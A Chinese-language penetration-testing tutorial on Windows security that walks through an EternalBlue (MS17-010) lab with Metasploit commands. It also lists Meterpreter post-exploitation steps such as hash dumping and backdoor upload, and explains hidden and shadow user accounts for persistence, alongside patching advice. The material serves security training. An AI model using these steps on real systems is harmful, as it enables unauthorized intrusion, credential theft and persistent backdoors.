Windows 系统安全入门
·
一、为什么要学习 Windows 系统基础?
对于安全从业者而言,Windows 系统是绕不开的核心目标:
- 覆盖范围广:个人设备、企业服务器、政务系统等场景均大量使用 Windows,攻击面广泛。
- 价值密度高:服务器版本(如 Windows Server 2008/2012/2016)往往承载核心业务,是高价值攻击目标。
- 攻防场景丰富:从本地提权到远程代码执行,从账户后门到漏洞利用,Windows 生态涵盖了渗透测试的全流程技术。
掌握 Windows 系统基础,是理解漏洞原理、开展渗透测试、构建防御体系的前提。
操作系统核心概念
操作系统是连接硬件与应用程序的中间层,核心作用是管理资源、提供接口、保障安全。在 Windows 中,我们重点关注:
- 进程与线程:程序运行的基本单位,是恶意代码执行的载体。
- 服务与端口:后台运行的程序(如 RDP、SMB)对外暴露端口,是远程攻击的入口。
- 权限与账户:决定了用户 / 程序能执行哪些操作,是权限维持与提权的核心。
主流操作系统分类
按用途可分为:
- 个人设备:Windows 10/11、macOS、Linux 桌面版,侧重交互体验与日常使用。
- 服务器系统:Windows Server、CentOS、Ubuntu Server,侧重稳定性与性能,是渗透测试中的高价值目标。
Windows 核心服务认知:RDP 远程桌面
RDP(Remote Desktop Protocol)是 Windows 自带的远程管理服务,默认端口 3389,是渗透测试中高频利用的入口:
- 连接前提:目标主机开启 RDP 服务、防火墙放行 3389 端口、攻击者拥有合法账户(或通过漏洞获取权限后开启 RDP)。
- 攻击场景:暴力破解密码、利用弱口令 / 凭据泄露获取远程权限、通过漏洞提权后开启 RDP 作为后门。
二、Windows 系统服务安全: MS17-010 永恒之蓝
(一)漏洞背景:永恒之蓝的威胁
MS17-010 是微软 2017 年修复的SMB 协议远程代码执行漏洞,因勒索病毒 “WannaCry” 利用该漏洞全球传播而闻名。
- 漏洞原理:攻击者通过构造恶意 SMBv1 数据包,可在未打补丁的 Windows 主机上远程执行任意代码,无需用户交互。
- 影响版本:Windows 7/Server 2008 等未安装 KB4013381 补丁的系统。
(二)SMB 协议基础
SMB(Server Message Block)是 Windows 用于文件共享、打印机共享的核心协议,默认端口 445。
- 版本差异:SMBv1 存在大量安全缺陷,SMBv2/3 已修复多数问题,但老旧系统仍广泛使用 SMBv1。
- 攻击面:SMB 服务默认开启于 Windows 服务器,一旦暴露公网,极易成为永恒之蓝等漏洞的攻击目标。
(三)漏洞利用实验:Kali + Win7 实战
1. 实验环境
- 攻击机:Kali Linux(预装 Metasploit 框架)
- 靶机:Windows 7 SP1(未安装 MS17-010 补丁,开启 445 端口)
- 网络:攻击机与靶机处于同一网段,确保连通性。
2. 利用步骤
- 启动 Metasploit 控制台:
bash
运行
msfconsole - 加载永恒之蓝漏洞模块:
bash
运行
use exploit/windows/smb/ms17_010_eternalblue - 配置靶机 IP:
bash
运行
set RHOSTS 192.168.1.100 # 替换为 Win7 靶机 IP set LHOST 192.168.1.101 # 替换为 Kali 本机 IP - 执行攻击:
bash
运行
若漏洞存在,将自动获取 Meterpreter 会话,获得靶机控制权。run
3. Meterpreter 核心操作(常用命令)
获取会话后,可执行以下关键操作:
sysinfo:查看靶机系统信息getuid:查看当前用户权限hashdump:导出本地账户密码哈希(用于破解或横向移动)upload/download:上传 / 下载文件(如植入后门)execute:执行系统命令或程序getsystem:尝试提权至 SYSTEM 权限
(四)关联知识:Windows 用户与组管理
1. 账户类型与权限等级
Windows 账户分为:
- 管理员账户:拥有系统最高权限,可修改配置、安装软件、管理其他用户。
- 标准用户:仅能修改个人文件,无法更改系统设置。
- SYSTEM 账户:系统内置最高权限账户,是渗透提权的终极目标。
2. 文件 / 文件夹权限(NTFS 系统)
NTFS 权限决定了用户对文件 / 文件夹的访问能力,核心类型包括:
- 读取(Read):查看文件内容与属性
- 写入(Write):修改文件内容、创建新文件
- 完全控制(Full Control):读取、写入、删除、修改权限等所有操作
配置方法:
- 图形界面:右键文件 / 文件夹 →「属性」→「安全」→ 编辑权限
- 命令行:使用
icacls命令批量修改权限
3. 核心管理命令(CMD 命令行)
net user:查看 / 创建 / 删除用户账户net localgroup:管理本地用户组net share:查看 / 创建共享文件夹sc:管理系统服务(如启动 / 停止 RDP 服务)
4. 安全后门:隐藏用户与影子用户
在渗透测试中,攻击者常通过创建隐藏用户维持权限:
- 简单隐藏用户:在用户名后添加
$符号(如hack$),通过net user命令无法直接查看,但易被工具排查。 - 影子用户:通过修改注册表,将普通用户关联至管理员账户,实现 “隐藏权限”,排查难度更高,是高级后门技术。
(五)漏洞防御策略
- 安装补丁:及时安装微软发布的 KB4013381 补丁,从根源修复漏洞。
- 禁用 SMBv1 协议:通过组策略或注册表关闭 SMBv1,使用更安全的 SMBv2/3。
- 端口防护:防火墙封禁 445 端口,避免 SMB 服务暴露公网。
- 流量监测:部署 IDS/IPS 设备,检测异常 SMB 数据包,及时发现攻击行为。
三、总结与进阶建议
Windows 系统安全是渗透测试的核心基础,从系统认知到漏洞利用,再到权限维持与防御,形成了完整的知识闭环:
- 入门阶段:重点掌握 Windows 核心服务、账户权限、基础命令,理解漏洞原理。
- 实战阶段:通过永恒之蓝等经典漏洞实验,熟悉渗透流程,掌握 Meterpreter 等工具操作。
- 进阶阶段:学习域渗透、高级后门技术、防御对抗策略,向红队 / 蓝队方向发展。
重要提醒:本文仅用于合法授权的渗透测试与安全研究,严禁对未授权系统发起攻击,否则将承担相应法律责任。
更多推荐
所有评论(0)